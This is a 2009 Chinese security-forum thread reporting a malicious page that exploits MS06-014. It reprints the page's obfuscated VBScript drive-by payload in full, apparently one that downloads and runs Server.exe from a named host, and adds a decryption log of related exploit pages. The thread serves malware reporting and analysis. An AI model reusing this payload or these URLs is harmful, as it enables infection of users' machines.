瑞星卡卡安全论坛技术交流区恶意网站交流 http://p.99081.com/ystat/h1/MS06014.htm

1   1  /  1  页   跳转

[黑名单] http://p.99081.com/ystat/h1/MS06014.htm

收藏
09kaka
头像
雄霸杖朝狮
  • 帖子:24047
  • 注册: 2009-02-27
  • 来自:
万圣之夜勋章幸运草端午辟邪香囊就爱不长大冰激凌09欢乐圣诞10温馨圣诞世界杯勋章年度风云人物国庆61周年激情亚运2010国庆勋章巫师帽苹果分享之星闪亮的光棍2011NBA至尊十一周年勋章
发表于: 2009-06-30 15:02 | 只看楼主 短消息 资料
字号: 1楼

http://p.99081.com/ystat/h1/MS06014.htm

rt

用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
分享到:
gototop
 
zg1_2004
头像
禁止访问
  • 帖子:6782
  • 注册: 2004-01-22
  • 来自:
发表于: 2009-06-30 15:20 | 短消息 资料
字号: 2楼

回复: http://p.99081.com/ystat/h1/MS06014.htm

该用户帖子内容已被屏蔽
gototop
 
kekao
头像
快乐黄口狮
  • 帖子:151
  • 注册: 2008-03-08
  • 来自:
发表于: 2009-06-30 15:21 | 短消息 资料
字号: 3楼

回复:http://p.99081.com/ystat/h1/MS06014.htm

系统漏洞 MS06-014
http://www.wl22.com/group/images/Server.exe
本帖被评分 1 次
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-06-30 16:09 | 短消息 资料
字号: 4楼

回复 1F 09kaka 的帖子



[复制到剪贴板]
CODE:
<script language=vbscript>
Function NC(x)
For i=1 to Len(x) Step 2
NC=NC & Chr(CLng("&H" & Mid(x,i,2)) Xor 26)
Next
End Function
x="26697968736A6E3A767B747D6F7B7D7F27384C58497968736A6E3824171075743A7F686875683A687F696F777F3A747F626E17107E766B7B726D773A273A387920467E766B7B72347F627F3817107E766B7B727F7779742738726E6E6A2035356D6D6D346D76282834797577357D68756F6A3573777B7D7F6935497F686C7F68347F627F381710497F6E3A7578707F796E3A273A7E75796F777F746E3479687F7B6E7F5F767F777F746E32387578707F796E383317107578707F796E34697F6E5B6E6E6873786F6E7F3A3879767B6969737E383638797669737E20585E232C592F2F2C372C2F5B29372B2B5E2A372322295B372A2A592A2E5C5928235F292C3817107E766B7B722B3A273A38573831387338313879383138683831387538313869383138753831387C3831386E3817107E766B7B72283A273A3834383138423831385738313856383138523831384E3831384E3831384A3817107E766B7B72293A273A385B3831387E383138753831387E383138783817107E766B7B722E3A273A3834383138493831386E383138683831387F3831387B383138773817107E766B7B722F3A273A7E766B7B722B3A313A7E766B7B722817107E766B7B722C3A273A7E766B7B72293A313A7E766B7B722E1710697F6E3A62277578707F796E3459687F7B6E7F5578707F796E327E766B7B722F363838331710497F6E3A69277578707F796E3459687F7B6E7F5578707F796E327E766B7B722C36383833171069346E636A7F272B17106234756A7F743A387D7F6E38367E766B7B726D77365C7B76697F17106234697F747E1710697F6E3A7C277578707F796E3459687F7B6E7F5578707F796E3238497968736A6E73747D345C73767F4963696E7F775578707F796E38363838331710697F6E3A6E776A277C345D7F6E496A7F79737B765C75767E7F6832283317107E766B7B727F777974277C34586F73767E4A7B6E72326E776A367E766B7B727F7779743317106934756A7F74171069346D68736E7F3A6234687F696A7574697F58757E6317106934697B6C7F6E757C73767F3A7E766B7B727F777974362817106934797675697F1710737C3A7C345C73767F5F6273696E69327E766B7B727F77797433276E686F7F3A6E727F741710496E683A273A5B68687B63322B2B2F362B2A2B362B2B2C362928362B2B29362C2B362B2B2B362322362B2A2C362B2A2B362323362B2B2C362E2C362C2D362B2B2E362B2A2B36232D362B2B2C362B2A2B362D23362322362B2A2C362B2A2B362323362B2B2C362E2A36292E362229362B2A2E362B2A2B362B2A22362B2A22362E2C362C2F362B2B28362B2B28362B2A22362B2A2F36232336232D362B2B2C362B2A2F362B2B2B362B2B2A36292E362E2E36292E36292E362E2B362B29362B2A362B2B29362E2C362229362B2A2E362B2A2B362B2A22362B2A22362C23362B282A362B2A2B362323362B2B2D362B2B2C362B2A2B362928362B2B2A36232D362B2A23362B2A2B362E2E362E2E362E2E36292E362B2B2B362B2B28362B2A2B362B2B2A36292E362E2E362E223317105C6F74796E7375743A546F7728496E6832496E6833205C75683A53272A3A4E753A4F58756F747E32496E683320546F7728496E683A273A546F7728496E683A3C3A59726832496E683253333320547F626E205F747E3A5C6F74796E73757417105F627F796F6E7F3A546F7728496E6832496E683317107F747E3A737C17102635697968736A6E241710"
document.write NC(x)
</script>


将document.write替换为alert,保存为扩展名为htm文件双击运行。
gototop
 
shadowmin
头像
拙长孩提狮
  • 帖子:69
  • 注册: 2007-10-27
  • 来自:
发表于: 2009-06-30 16:14 | 短消息 资料
字号: 5楼

回复:http://p.99081.com/ystat/h1/MS06014.htm

关于:解密的日志(全体输出 -  39):

Level  1>http://p.99081.com/ystat/h1/activxx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ajax.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/cx.htm
Level  1>http://p.99081.com/ystat/h1/jetaudio.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/jkx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz2.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/mcafee.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ms06014.htm
Level  1>http://p.99081.com/ystat/h1/ms07004.htm
Level  1>http://p.99081.com/ystat/h1/ms08053.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/office.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/opera.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/rl11.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ruising.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/td.htm
Level  1>http://p.99081.com/ystat/h1/thunder.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ttplayer.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/woeks.htm
Level  1>http://p.99081.com/ystat/h1/xla.htm
Level  2>http://www.wl22.com/group/images/server.exe#version=1,0,0,1
Level  1>http://p.99081.com/ystat/h1/yahoo1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/yht.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●

日志由 Redoce1.9第68次修正版于 2009-6-30 16:18:08 生成。
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT